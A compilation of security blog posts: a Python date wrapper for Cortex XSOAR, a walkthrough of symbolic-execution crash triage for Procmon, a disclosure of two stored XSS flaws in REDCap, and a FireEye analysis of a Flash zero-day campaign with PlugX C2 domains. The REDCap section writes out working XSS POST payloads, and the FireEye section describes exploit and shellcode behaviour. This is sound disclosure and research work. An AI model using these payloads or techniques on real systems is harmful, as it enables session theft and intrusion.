In a future post, we will use our findings to query Microsoft Sentinel for some Incident data, and display the results of that search in dashboards, as well as within incidents. However, a first hurdle will be that not every system we interact with will blindly accept the from and to fields that Cortex XSOAR passes on to us, especially if we get one of those special values. We will first have to come up with a software wrapper that will let us obtain date objects that we can more easily manipulate in Python.

A proposal for interpreting dates in XSOAR

To use the dates stored in our Cortex XSOAR Incidents, and to build our own automation based dashboard widgets, we have come up with an Object Oriented wrapper.
This wrapper introduces classes to describe both these explicit datetimes and their relative counterparts, as well as factories to craft these out of standard XSOAR parameters.

The following snippet describes the different classes:

from abc import ABC

class NitroDate(ABC):
    pass

class NitroRegularDate(NitroDate):
    def __init__(self, date: datetime = None):
        self.date = date

class NitroUnlimitedPastDate(NitroDate):
    pass

class NitroUnlimitedFutureDate(NitroDate):
    pass

class NitroUndefinedDate(NitroDate):
    pass

NitroDate is an empty parent class, with 4 child classes:

  • NitroRegularDate
  • NitroUnlimitedPastDate
  • NitroUnlimitedFutureDate
  • NitroUndefinedDate

NitroRegularDate represents an explicit date, and stores it as a datetime object.

NitroUnlimitedPastDate and NitroUnlimitedFutureDate are both representations of the special date January 1st year 1, but reflect the context they were mentioned in.

NitroUnlimitedPastDate represents that special value having been passed from a “from” argument, such as with the “Up to X days ago” time picker.

NitroUnlimitedFutureDate represents that special value having been passed from a “to” argument, such as with the “From x days ago” time picker.

Finally, NitroUndefinedDate represents either the special value when we cannot identify the argument it was passed from, or the fact that we could not properly parse a date given in input.

Now that we’ve defined the classes we will use to represent our datetimes, we need to build them, preferably from the data supplied by Cortex XSOAR.

from abc import ABC
from datetime import datetime, timezone
from enum import Enum
import dateutil

class NitroDateHint(Enum):
    Future = 1
    Past = 2
# an Enum used as a flag for functions that build NitroDates


class NitroDateFactory(ABC):
    """this class is a factory, as in it's able to generate NitroDates from a variety of initial arguments"""
    @classmethod
    def from_iso_8601_string(cls, arg: str = ""):
        """
        this function is able to create a NitroDate from an iso 8601 datestring
        :param arg: the iso 8601 string
        :type arg: str
        """
        try:
            date = dateutil.parser.isoparse(arg)
        except Exception as e:
            raise NitroDateParsingError from e
        return NitroRegularDate(date=date)

    @classmethod
    def from_regular_xsoar_date_range_arg(cls, arg: str = "", hint: NitroDateHint = None):
        """
        this function is able to create a NitroDate from a single argument passed by
        a xsoar GUI element and a Hint
        :param arg: the iso 8601 string or cheatlike string
        :type arg: str
        :param hint: a hint to know whether the date, if a predetermined value, should be interpreted as future or past
        :type hint: NitroDateHint
        """
        if arg == "0001-01-01T00:00:00Z":
            if hint is None:
                return NitroUndefinedDate()
            elif hint == NitroDateHint.Future:
                return NitroUnlimitedFutureDate()
            elif hint == NitroDateHint.Past:
                return NitroUnlimitedPastDate()
        else:
            return cls.from_iso_8601_string(arg=arg)

    @classmethod
    def from_regular_xsoar_date_range_args(cls, the_args: dict) -> (NitroDate, NitroDate):
        """
        this function is able to create NitroDates from the two arguments passed by
        a xsoar GUI element
        :param the_args: the args passed to the xsoar automation by the timepicker GUI element
        :type the_args: dict
        """
        ret = [NitroUndefinedDate(), NitroUndefinedDate()]
        if isinstance(the_args, dict):
            for word, i, hint in [("from", 0, NitroDateHint.Past), ("to", 1, NitroDateHint.Future)]:
                if isinstance(tmp := the_args.get(word, None), str):
                    nitro_date = cls.from_regular_xsoar_date_range_arg(arg=tmp, hint=hint)
                    # print(f"arg={tmp}, hint={hint}, date={nitro_date}")
                    if isinstance(nitro_date, NitroDate):
                        ret[i] = nitro_date
        return ret

The Factory presented above eases work during the development of a dashboard widget, by allowing to get two NitroDates with this simple call

FromDate, ToDate = NitroDateFactory.from_regular_xsoar_date_range_args(demisto.args())

The following screenshot demonstrates the use of this factory function and the type and value of it’s outputs when run against Cortex XSOAR data

Screenshot of PyCharm showcasing the use of from_regular_date_range_args

From there on, we can check the type of FromDate and ToDate and more easily build logic to query third party systems. At that stage, the wrapper correctly identifies the datetimes and timeframes, which it returns as standardized python objects, whether they were passed down in a function call or stored in an incident, and is able to detect errors in their formatting.

In a future post, we use this mechanism to query external APIs in a Cortex XSOAR dashboard.

References

NVISO Github Repository

ISO 8601

XSOAR documentation on automations

XSOAR – add a widget to a dashboard

XSOAR – creating a widget automation

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Symbolic Triage: Making the Best of a Good Situation

31 October 2022 at 18:40

Symbolic Execution can get a bad rap. Generic symbex tools have a hard time proving their worth when confronted with a sufficiently complex target. However, I have found symbolic execution can be very helpful in certain targeted situations. One of those situations is when triaging a large number of crashes coming out of a fuzzer, especially in cases where dealing with a complicated or opaque target. This is the "Good Situation" I have found myself in before, where my fuzzer handed me a large load of crashes that resisted normal minimization and de-duplication. By building a small symbolic debugger I managed a much faster turnaround time from fuzz-case to full understanding.

In this post I want to share my process for writing symbolic execution tooling for triaging crashes, and try to highlight tricks I use to make the tooling effective and flexible. The examples here all use the great Triton library for our symbolic execution and solving. The examples all use code hosted at: github.com/atredis-jordan/SymbolicTriagePost

(Oh BTW, we have a course!) Do you reverse engineer and symbolically execute in your workflows, or want to?

Are you using fuzzing today but want to find more opportunities to improve it and find deeper and more interesting bugs?

Can you jam with the console cowboys in cyberspace?

We've developed a 4-day course called "Practical Symbolic Execution for VR and RE" that's tailored towards these exact goals. It’s fun and practical, with lots of demos and labs to practice applying these concepts in creative ways. If that sounds interesting to you, there is more information at the bottom of this post. Hope to see you there!

We will be using a bunch of crashes in Procmon64.exe for our examples. Procmon's parsing of PML (Process Monitor Log) files is pretty easy to knock over, and we can quickly get lots of crashes out of a short fuzzing session. It is a large opaque binary with some non-determinism to the crashes, so useful tooling here will help us to speed up our reverse engineering efforts. Note that we weren't exhaustive in trying to find bugs in Procmon; so although these bugs we will talk about here don't appear super useful to an attacker, I won't be opening any untrusted PML files any time soon.

I gathered a bunch of crashes by making a few very small PML files and throwing Jackalope at the target. After a few hours we had 200ish odd crashes to play with. Many of the crashes were unstable, and only reproduced occasionally.

..\Jackalope\Release\fuzzer.exe -iterations_per_round 30 -minimize_samples false -crash_retry 0 -nthreads 32 -in - -resume -out .\out -t 5000 -file_extension PML -instrument_module procmon64.exe -- procmon64.exe /OpenLog @@ /Quiet /Runtime 1 /NoFilter /NoConnect

Fuzzing Procmon's PML paser with Jackalope

A Simple Debugger

With all this hyping up symbolic execution, our first step is to not use Symbolic Execution! Knowing when to turn to symbolic execution and when just to use emulation or a debugger is a good skill to have. In this case, we are going to write a very simple debugger using the Windows debugging API. This debugger can be used to re-run our crashing inputs, find out how stable they are, see if they all happen in the main thread, gather stack traces, etc.

Also, having a programmatic debugger will be very useful when we start symbolically executing. We will talk about that here in a second, first let's get our debugger off the ground.

Quick aside. All my code examples here are in python, because I like being able to pop into IPython in my debuggers. I defined a bunch of ctypes structures in the win_types.py file. I recommend having some programmatic way to to generate the types you need. Look into PDBRipper or cvdump as a good place to start.

Okay, so first we want a debugger that can run the process until it crashes and collect the exception information. The basic premise is we start a process as debugged (our connect_debugger function in triage.py), and then wait on it until we get an unhandled exception. Like so:

    handle, main_tid = connect_debugger(cmd)

    log("process", 3, f": -- ")

    event = dbg_wait(handle, None)
    code = event.dwDebugEventCode

    if code == EXIT_PROCESS_DEBUG_EVENT:
        log("crash", 1, f" Closed with no crash")
    elif code == EXCEPTION_DEBUG_EVENT:
        # exception to investigate
        log("crash", 1, f" crashed:")
        er = event.u.Exception.ExceptionRecord
        log("crash", 1, exceptionstr(handle, er, event.dwThreadId))

    else:
        log("process", 1, f" hit unexpected Debug Event ")

    dbg_kill(handle)

A piece of triage.py's handle_case, running a single test case

Running the above code to get the exception information from a crash

Many of the crashes will not happen every time due to some non-determinism. Running through all our test cases multiple times in our debugger, we can build a picture of which crashes are the most stable, if they stay in the main thread, and what kind of exception is happening.

.\crsh\access_violation_0000xxxxxxxxx008_00000xxxxxxxx5AA_1.PML -- 100% (18) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x520 read at 0x5aa
         EXCEPTION_STACK_BUFFER_OVERRUN(0xc0000409) @ 0x83c
.\crsh\access_violation_0000xxxxxxxxx008_00000xxxxxxxx5AA_2.PML -- 100% (34) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x520 read at 0x5aa
.\crsh\access_violation_0000xxxxxxxxx063_00000xxxxxxxx3ED_1.PML -- 100% (34) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x520 read at 0x3ed
...
.\crsh\access_violation_0000xxxxxxxxx3D4_00000xxxxxxxxED1_2.PML -- 52% (23) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed1
.\crsh\access_violation_0000xxxxxxxxx234_00000xxxxxxxxED4_3.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed4
.\crsh\access_violation_0000xxxxxxxxx3CA_00000xxxxxxxxED1_1.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed1
.\crsh\access_violation_0000xxxxxxxxx5EC_00000xxxxxxxx0A2_1.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed4
.\crsh\access_violation_0000xxxxxxxxx5EF_00000xxxxxxxxF27_1.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xecb
.\crsh\access_violation_0000xxxxxxxxxB46_00000xxxxxxxxFF4_1.PML -- 44% (18) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed4
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
.\crsh\access_violation_0000xxxxxxxxx25A_00000xxxxxxxxED4_1.PML -- 38% (21) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xecb
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x19d read at 0x184
...

Gathered information from multiple runs

Let me have another quick aside. Windows exceptions are nice because they can contain extra information. The exception record tells us if an access violation is a read or a write, as well as the pointer that lead to the fault. On Linux, it can be hard to get that information programmatically, as a SEGFAULT is just a SEGFAULT. Here we can use our symbolic execution engine to lift only the faulting instruction. The engine will provide us the missing information on what loads or stores happened, letting us differentiate between a boring NULL read and an exciting write past the end of a page.

Getting our Symbolic Execution Running, and a Few Tricks

We now have a simple debugger working using the Windows debugger API (or ptrace or whatever). Now we can add our symbolic engine into the mix. The game plan is to use our debugger to run the target until our input is in memory somewhere. Then we will mark the input as symbolic and trace through the rest of the instructions in our symbolic engine.

Marking input as “symbolic” here means we are telling our engine that these values are to be tracked as variables, instead of just numbers. This will let the expressions we see all be in terms of our input variables, like “rax: (add INPUT_12 0x12)” instead of just “rax: 0x53”. A better term would be “concolic” (concrete-symbolic) because we are still using the actual value of these input bytes, just adding the symbolic information on top of them. I just use the term symbolic in this post, though.

Our debugger will tell us when we reach the exception. From there we should be able to inspect the state at the crash in terms of our symbolic input. For an access violation we hope to see that the pointer dereferenced is symbolically "(0xwhatever + INPUT_3c)" or some other symbolic expression, showing us what in our input caused the crash.

This information is useful for root causing the crash (we will see a couple cool tricks for working with this information in the next section). We gather this symbolic info so we can take the constraints that kept us on the crashing path, along with our own constraints, and send those to a solver. Using the solver we can ask "What input would make this pointer be X instead?" This lets us quickly identify a Write-What-Where from a Read8-AroundHere, or a Write-That-ThereGiveOrTake100. We can break our symbolic debugger at any point in a trace and use the solver to answer our questions.

Stopping at a breakpoint, and seeing what input would make RBX equal 0x12340000 here

Note: I should point out that it isn't strictly necessary to use a debugger at all. We could just load procmon64.exe and it's libraries into our symbolic execution engine, and then emulate the instructions without a debugger's help. If you see the great examples in the Triton repo, you will notice that none of them step along with a debugger. I like using a symbolic execution engine alongside a debugger for a couple of reasons. I’ll highlight a few of those reasons in the following paragraphs.

The main reason is probably to avoid gaslighting myself. With a debugger or a concrete execution trace I have a ground truth I can follow along with. Without that it is easy to make a mistake when setting up our execution environment and not realize until much later. Things like improperly loading libraries, handling relocations, or setting up the TEB and PEB on windows. By using a debugger, we can just setup our execution environment by pulling in chunks of memory from the actual process. We can also load the memory on demand, so we can save time on very large processes. In our example we load the memory lazily with Triton's GET/SET_CONCRETE_MEMORY_VALUE callbacks.

def tri_init(handle, onlyonsym=False, memarray=False):
    # do the base initialization of a TritonContext

    ctx = TritonContext(ARCH.X86_64)
    ctx.setMode(MODE.ONLY_ON_SYMBOLIZED, onlyonsym)
    if memarray:
        ctx.setMode(MODE.MEMORY_ARRAY, True)
    else:
        ctx.setMode(MODE.ALIGNED_MEMORY, True)
    ctx.setMode(MODE.AST_OPTIMIZATIONS, True)

    # set lazy memory loading
    def getmemcb(ctx, ma):
        addr = ma.getAddress()
        sz = ma.getSize()
        # will only load pages that have not been previously loaded
        tri_load_dbg_mem(ctx, handle, addr, sz, False)

    def setmemcb(ctx, ma, val):
        addr = ma.getAddress()
        sz = ma.getSize()
        # will only load pages that have not been previously loaded
        tri_load_dbg_mem(ctx, handle, addr, sz, True)

    ctx.addCallback(CALLBACK.GET_CONCRETE_MEMORY_VALUE, getmemcb)
    ctx.addCallback(CALLBACK.SET_CONCRETE_MEMORY_VALUE, setmemcb)

    return ctx

Setting up Triton in triage.py

The debugger also lets us handle instructions that are unknown to our symbolic execution engine. For example, Triton does not have a definition for the 'rdrand' instruction. By single stepping alongside our debugger, we can simply fix up any changed registers when we encounter unknown instructions. This could lead to a loss of symbolic information if the instruction is doing something with our symbolic inputs, but for the most part we can get away with just ignoring these instructions.

Lastly, using our debugger gives us another really nice benefit; we can just skip over whole swaths of irrelevant code! We have to be very careful with what we mark as irrelevant, because getting it wrong can mean we lose a bunch of symbolic information. With procmon, I marked most of the drawing code as irrelevant. When hitting one of these imports from user32 or gdi32, we place a breakpoint and let the debugger step over those calls, then resume single stepping with Triton. This saves a ton of time, as symbolic execution is orders of magnitude slower than actual execution. Any irrelevant code we can step over can make a huge difference.

Without a debugger we can still do this, but it usually involves writing hooks that will handle any important return values or side effects from those calls, instead of just bypassing them with our debugger. Building profiling into our tooling can help us identify those areas of concern, and adjust our tooling to gain back some of that speed.

    # skip drawing code
    if skip_imports:
        impfuncs = dbg_get_imports_from(handle, base, ["user32.dll", "gdi32.dll", "comdlg32.dll", "comctl32.dll"])
        for name in impfuncs:
            addr = impfuncs[name]

            # don't skip a few user32 ones
            skip = True
            for ds in ["PostMessage", "DefWindowProc", "PostQuitMessage", "GetMessagePos", "PeekMessage", "DispatchMessage", "GetMessage", "TranslateMessage", "SendMessage", "CallWindowProc", "CallNextHook"]:
                if ds.lower() in name.lower():
                    skip = False
                    break

            if skip:
                hooks[addr] = (skipfunc_hook, name)

Skipping unneeded imports in triage.py

For our target, skipping imports wasn't enough. We were still spending lots of time in loops inside the procmon binary. A quick look confirmed that these were a statically included memset and memcpy. We can't just skip over memcpy because we will lose the symbolic information being copied. So for these two, we wrote a hook that would handle the operation symbolically in our python, without having to emulate each instruction. We made sure that copied bytes got a copy of the symbolic expression in the source data.

    for i in range(size):
        sa = MemoryAccess(src + i, 1)
        da = MemoryAccess(dst + i, 1)
        cell = ctx.getMemoryAst(sa)
        expr = ctx.newSymbolicExpression(cell, "memcpy byte")
        ctx.assignSymbolicExpressionToMemory(expr, da)

Transfering symbolic information in our memcpy hook

These kind of hooks not only save us time, but they are a great opportunity to check the symbolic arguments going into the memcpy or memset. Even if the current trace is not going to crash inside of the memcpy, we have the ability to look at those symbolic arguments and ask "Could this memcpy reach unmapped memory?" or "Could the size argument be unreasonably large?". This can help us find other vulnerabilities, or other expressions of the issues we are already tracing. Below is a small check that tries to see if the end of a memcpy's destination could be some large amount away.

        astctx = ctx.getAstContext()
        cond = ctx.getPathPredicate()
        # dst + size
        dstendast = ctx.getRegisterAst(ctx.registers.rcx) + ctx.getRegisterAst(ctx.registers.r8)
        # concrete value of the dst + size
        dstendcon = dst + size
        testpast = 0x414141
        cond = astctx.land([cond, (dstendcon + testpast) <= dstendast])

        log("hook", 5, "Trying to solve for a big memcpy")
        model, status, _ = ctx.getModel(cond, True)
        if status == SOLVER_STATE.SAT:
            # can go that far
            # this may not be the cause of our crash though, so let's just report it, not raise it
            log("crash", 2, "Symbolic memcpy could go really far!")

A simple check in our memcpy hook from triage.py

The tradeoff of these checks is that invoking the solver often can add to our runtime, and you probably don't want them enabled all the time.

At this point we have most of what we need to run through our crashing cases and start de-duplicating and root-causing. However, some of our access violations were still saying that the bad dereference did not depend on our input. This didn't make sense to me, so I suspected we were losing symbolic information along the way somehow. Sometimes this can happen due to concretization of pointers, so turning on Triton's new MEMORY_ARRAY mode can help us recover that information (at the cost of a lot of speed).

In this case, however, I had my tooling print out all the imported functions being called along the trace. I wanted to see if any of the system calls on the path were causing a loss of symbolic information. Or if there was a call that re-introduced the input without it being symbolized. I found that there was another second call to MapViewOfFile that was remapping our input file into memory in a different location. With a hook added to symbolize the remapped input, all our crashes were now reporting their symbolic relation to the input correctly!

Our tooling showing an AST for one of the bad dereferences

Using our Symbolic Debugger

Cool! Now we have symbolic information for our crashes. What do we do with it?

Well first, we can quickly group our crashes by what input they depend on. This is quite helpful; even though some issues can lead to crashes in multiple locations, we can still group them together by what exact input is lacking bounds checks. This can help us understand a bug better, and also see different ways the bug can interact with the system.

By grouping our crashes, it looked like our 200ish crashes boil down to four distinct groups: three controlled pointers being read from and one call to __fastfail.

One neat tool Triton gives us is backward slicing! Because Triton can keep a reference of the associated instruction when building it's symbolic expressions, we can generate a instruction trace that only contains the instructions relevant to our final expression. I used this to cut out most code along the trace as irrelevant, and be able to walk just the pieces of code between the input and the crash that were relevant. Below we gather relevant instructions that created the bad pointer that was dereferenced in one of our crashes.

def backslice_expr(ctx, symbexp, print_expr=True):
    # sort by refId to put things temporal
    # to get a symbolic expression from a load access, do something like:
    # symbexp = inst.getLoadAccess()[0][0].getLeaAst().getSymbolicExpression()
    items = sorted(ctx.sliceExpressions(symbexp).items(), key=lambda x: x[0])
    for _, expr in items:
        if print_expr:
            print(expr)
        da = expr.getDisassembly()
        if len(da) > 0:
            print("\t" if print_expr else "", da)

A back-slicing helper in triage.py-

Back-slicing with the above code

Being able to drop into the IPython REPL at any point of the trace and see the program state in terms of my input is very helpful during my RE process.

For the call to __fastfail (kinda like an abort for Windows), we don't have a bad dereference to back-slice here, instead we have the path constraints our engine gathered. These constraints are grabbed any time the engine sees that we could symbolically go either way at a junction. To stay tied to our concrete path, the engine notes down the condition required for our path. For example: if we take a jne branch after having compared the INPUT_5 byte against 0, the engine will add a path constraint saying "If you want to stay on the path we took, make sure INPUT_5 is not 0", or "(not (= INPUT_5 (_ bv0 8))" in AST-speak.

These path constraints are super useful. We can use them to generate other inputs that would go down unexplored paths. There are lots of nice symbolic execution tools that use this to help a fuzzer by generating interesting new inputs. (SymCC, KLEE, Driller, to name three)

In our case, we can inspect them to find out why we ended up at the __fastfail. By just looking at the most recent path constraint, we can see where our path forked off most recently due to our input.

The most recent path constraint leading to the __fastfail

The disassembly around the most recent path constraint

The path constraint tells us that the conditional jump at 0x7FF7A3F43517 in the above disassembly is where our path last forked due to one of our input values. When we follow the trace after this fork, we can see that it always leads directly to our fatal condition. To get more information on why the compare before the fork failed, I dropped into an IPython shell for us at that junction. Our tooling makes it easy to determine the control we have over the pointer in RCX being dereferenced before the branch. That makes this another crash due to a controlled pointer read.

Showing the AST for the dereferenced register before the branch

Where To Go From Here

So from here we have a pretty good understanding of why these issues exist in procmon64.exe. Digging in a little deeper into the crashes shows that they are probably not useful for crafting a malicious PML file. If I wanted to keep going down this road, my next steps would include:

  • Generating interesting test cases for our fuzzer based off the known unchecked areas in the input

  • Identifying juicy looking functions in our exploit path. With our tooling we can gather information on what control we have in those functions. With this information we can start to path explore or generate fuzz cases that follow our intuition about what areas look interesting.

  • Patch out the uninteresting crash locations, and let our fuzzer find better paths without being stopped by the low-hanging fruit.

  • Generate a really small crashing input for fun.

The official policy of Microsoft is "All Sysinternals tools are offered 'as is' with no official Microsoft support." We were unable to find a suitable place to report these issues. If anyone with ties to the Sysinternals Suite wants more information, please contact us.

Hope this Helped! Come Take the Course!

I hope this post helped you see useful ways in which creative symbolic execution tooling could help their workflow! If anyone has questions or wants to talk about it, you can message me @jordan9001 or at [email protected].

If you got all the way to the end of this post, you would probably like our course!

"Practical Symbolic Execution for VR and RE" is hands-on. I had a lot of fun making it, and we look at a variety of ways to apply these concepts. Students spend time becoming comfortable with a few frameworks, deobfuscating binaries, detecting time-of-check time-of-use bugs, and other interesting stuff.

You can give us your information below, and we will email you when we next offer a public course. (No spam or anything else, I promise.)

If you have a group that would be interested in receiving this kind of training privately, feel free to contact us about that as well! I’d like to see you in a class sometime!

Thanks!

Subscribe to Atredis Training News

Sign up with your email address to receive news and updates on when the next public Atredis Training will be available.

We respect your privacy, and will not use your contact information for anything other than news about Atredis Trainings.

Thank you!

CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting

15 June 2022 at 09:00

Nettitude identified two stored Cross Site Scripting (XSS) vulnerabilities within Vanderbilt REDCap.  These have been assigned CVE-2022-24004 & CVE-2022-24127.

REDCap is a web application which allows the creation and management of online surveys for research purposes. Version 12.0.11 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the Messenger functionality and the administration interface.

CVE-2022-24004 – Proof of Concept

REDCap has a built in messenger function which allows all registered users to communicate within the application. Each conversation created has a title which can only be edited by the user which originally created the conversation. The input field where this title can be edited does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST data sent to Messenger_ajax.php:

action=change-conversationtitle&amp;thread_id=7&amp;new_title=%22+onclick%3Dalert(document.location)+&amp;username=m17664jp&amp;limit=8&amp;redcap_csrf_token=1c5c586a0e3d614dfba3401a1dd92f508d4f915a

This payload will then trigger in the browser where the messenger sidebar is toggled of any user which is a participant of the conversation. The following screenshot shows that the payload is injected into the data-tooltip parameter of the h4 tag.

For this simple proof of concept, the user would have to click on the message title, resulting in the execution of a JavaScript alert.

Graphical user interface, application Description automatically generated

The impact of this vulnerability could lead to the disclosure of sensitive application and survey data. Given that the messenger functionality will autocomplete usernames after providing the first character, it is possible to see how an attacker could create a conversation with all application users to maximise chances of compromising application data from an administrator user.

Nettitude demonstrated the impact of this to the application vendor by further improving the proof of concept to automatically trigger on page load and scrape the contents of the users screen, sending this data to a remote server.

CVE-2022-24004 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: Messenger_ajax.php
  • Vulnerable parameter: new_title

CVE-2022-24127 – Proof of Concept

In the project administration section of the application, admin users that have permissions to modify a project can modify the project title. The input field where this value is modified does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST Data sent to edit_project_settings.php:

surveys_enabled=1&repeatforms=0&scheduling=0&randomization=0&app_title=a%3C%2Ftitle%3E%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&purpose=0&project_pi_firstname=&project_pi_mi=&project_pi_lastname=&project_pi_email=&project_pi_alias=&project_irb_number=&purpose_other=&project_note=test&projecttype=on&repeatforms_chk=on&redcap_csrf_token=9158988d73045f982cb373f607a607022391e1df

Once the project title is modified, the user is returned to the project administration home page where the payload immediately triggers and will continue to be executed across all administration pages related to the project.

Text Description automatically generated

This code execution is triggered due to the project title being reflected in the page <title> tag. If a user enters a value which first closes the tag, then any further HTML or JavaScript can be executed as shown in the following screenshot.

Graphical user interface, text, application, email Description automatically generated

The impact this vulnerability is reduced because it would require the attacker to have existing access as a user with project administration permissions. An attacker could potentially exploit this issue to redirect the user to a malicious website controlled by the attacker, which may ultimately lead to credential harvesting or the downloading of malware.

CVE-2022-24127 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: edit_project_settings.php
  • Vulnerable parameter: app_title

Conclusion

All areas of a web application which accept and store user input should not be trusted.  Appropriate measures should be taken to sanitize or encode data before being shown in a later browser response.

Nettitude contacted Vanderbilt to disclose these vulnerabilities. Remediation was put in place almost immediately post-disclosure and a remediated version (12.0.13) was promptly released.

A picture containing text Description automatically generated

Timeline – CVE-2022-24004

  1. Discovered by Nettitude: 25 January 2022
  2. Vendor informed: 26 January 2022
  3. CVE Assigned: 26 January 2022
  4. Vendor fix released: 28 January 2022
  5. Nettitude Blog: 15 June 2022

Timeline – CVE-2022-24127

  1. Discovered by Nettitude: 28 January 2022
  2. Vendor informed: 28 January 2022
  3. Vendor fix released: 28 January 2022
  4. CVE assigned: 29 January 2022
  5. Nettitude Blog: 15 June 2022

 

The post CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting appeared first on Nettitude Labs.

Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit

20 February 2014 at 18:00

Less than a week after uncovering Operation SnowMan, the FireEye Dynamic Threat Intelligence cloud has identified another targeted attack campaign — this one exploiting a zero-day vulnerability in Flash. We are collaborating with Adobe security on this issue. Adobe has assigned the CVE identifier CVE-2014-0502 to this vulnerability and released a security bulletin.

As of this blog post, visitors to at least three nonprofit institutions — two of which focus on matters of national security and public policy — were redirected to an exploit server hosting the zero-day exploit. We’re dubbing this attack “Operation GreedyWonk.”

We believe GreedyWonk may be related to a May 2012 campaign outlined by ShadowServer, based on consistencies in tradecraft (particularly with the websites chosen for this strategic Web compromise), attack infrastructure, and malware configuration properties.

The group behind this campaign appears to have sufficient resources (such as access to zero-day exploits) and a determination to infect visitors to foreign and public policy websites. The threat actors likely sought to infect users to these sites for follow-on data theft, including information related to defense and public policy matters.

Discovery

On Feb. 13, FireEye identified a zero-day Adobe Flash exploit that affects the latest version of the Flash Player (12.0.0.4 and 11.7.700.261). Visitors to the Peter G. Peterson Institute for International Economics (www.piie[.]com) were redirected to an exploit server hosting this Flash zero-day through a hidden iframe.

We subsequently found that the American Research Center in Egypt (www.arce[.]org) and the Smith Richardson Foundation (www.srf[.]org) also redirected visitors the exploit server. All three organizations are nonprofit institutions; the Peterson Institute and Smith Richardson Foundation engage in national security and public policy issues.

Mitigation

To bypass Windows’ Address Space Layout Randomization (ASLR) protections, this exploit targets computers with any of the following configurations:

  • Windows XP
  • Windows 7 and Java 1.6
  • Windows 7 and an out-of-date version of Microsoft Office 2007 or 2010

Users can mitigate the threat by upgrading from Windows XP and updating Java and Office. If you have Java 1.6, update Java to the latest 1.7 version. If you are using an out-of-date Microsoft Office 2007 or 2010, update Microsoft Office to the latest version.

These mitigations do not patch the underlying vulnerability. But by breaking the exploit’s ASLR-bypass measures, they do prevent the current in-the-wild exploit from functioning.

Vulnerability analysis

GreedyWonk targets a previously unknown vulnerability in Adobe Flash. The vulnerability permits an attacker to overwrite the vftable pointer of a Flash object to redirect code execution.

ASLR bypass

The attack uses only known ASLR bypasses. Details of these techniques are available from our previous blog post on the subject (in the “Non-ASLR modules” section).

For Windows XP, the attackers build a return-oriented programming (ROP) chain of MSVCRT (Visual C runtime) gadgets with hard-coded base addresses for English (“en”) and Chinese (“zh-cn” and “zh-tw”).

On Windows 7, the attackers use a hard-coded ROP chain for MSVCR71.dll (Visual C++ runtime) if the user has Java 1.6, and a hard-coded ROP chain for HXDS.dll (Help Data Services Module) if the user has Microsoft Office 2007 or 2010.

Java 1.6 is no longer supported and does not receive security updates. In addition to the MSVCR71.dll ASLR bypass, a variety of widely exploited code-execution vulnerabilities exist in Java 1.6. That’s why FireEye strongly recommends upgrading to Java 1.7.

The Microsoft Office HXDS.dll ASLR bypass was patched at the end of 2013. More details about this bypass are addressed by Microsoft’s Security Bulletin MS13-106 and an accompanying blog entry. FireEye strongly recommends updating Microsoft Office 2007 and 2010 with the latest patches.

Shellcode analysis

The shellcode is downloaded in ActionScript as a GIF image. Once ROP marks the shellcode as executable using Windows’ VirtualProtect function, it downloads an executable via the InternetOpenURLA and InternetReadFile functions. Then it writes the file to disk with CreateFileA and WriteFile functions. Finally, it runs the file using the WinExec function.

PlugX/Kaba payload analysis

Once the exploit succeeds, a PlugX/Kaba remote access tool (RAT) payload with the MD5 hash 507aed81e3106da8c50efb3a045c5e2b is installed on the compromised endpoint. This PlugX sample was compiled on Feb. 12, one day before we first observed it, indicating that it was deployed specifically for this campaign.

This PlugX payload was configured with the following command-and-control (CnC) domains:

  • java.ns1[.]name
  • adservice.no-ip[.]org
  • wmi.ns01[.]us

Sample callback traffic was as follows:

POST /D28419029043311C6F8BF9F5 HTTP/1.1

Accept: */*

HHV1: 0

HHV2: 0

HHV3: 61456

HHV4: 1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; SV1)

Host: java.ns1.name

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

Campaign analysis

Both java.ns1[.]name and adservice.no-ip[.]org resolved to 74.126.177.68 on Feb. 18, 2014. Passive DNS analysis reveals that the domain wmi.ns01.us previously resolved to 103.246.246.103 between July 4, 2013 and July 15, 2013 and 192.74.246.219 on Feb. 17, 2014.  java.ns1[.]name also resolved to 192.74.246.219 on February 18.

Domain First Seen Last Seen IP Address
